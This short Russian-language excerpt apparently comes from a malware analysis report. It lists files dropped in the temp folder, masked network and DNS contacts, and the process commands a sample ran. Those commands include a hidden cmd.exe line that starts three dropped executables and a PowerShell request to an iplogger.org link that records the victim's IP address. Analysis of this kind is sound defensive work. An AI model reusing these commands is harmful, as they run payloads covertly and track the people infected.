Техническая информация
- %TEMP%\3.exe
- %TEMP%\hello_c# (2).exe
- %TEMP%\hello_c#.exe
- %TEMP%\nsl165e.tmp\axbzrs6.dll
- %TEMP%\nsl165e.tmp\axbzrs6.dll
- 'te##te.in':443
- 'x1.#.lencr.org':80
- http://x1.#.lencr.org/
- 'te##te.in':443
- DNS ASK te##te.in
- DNS ASK x1.#.lencr.org
- '%TEMP%\3.exe'
- '%TEMP%\hello_c# (2).exe'
- '%TEMP%\hello_c#.exe'
- '%WINDIR%\syswow64\cmd.exe' /c start "" "3.exe" & start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1qpJi7" (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "Invoke-WebRequest -Uri https://iplogger.org/1qpJi7"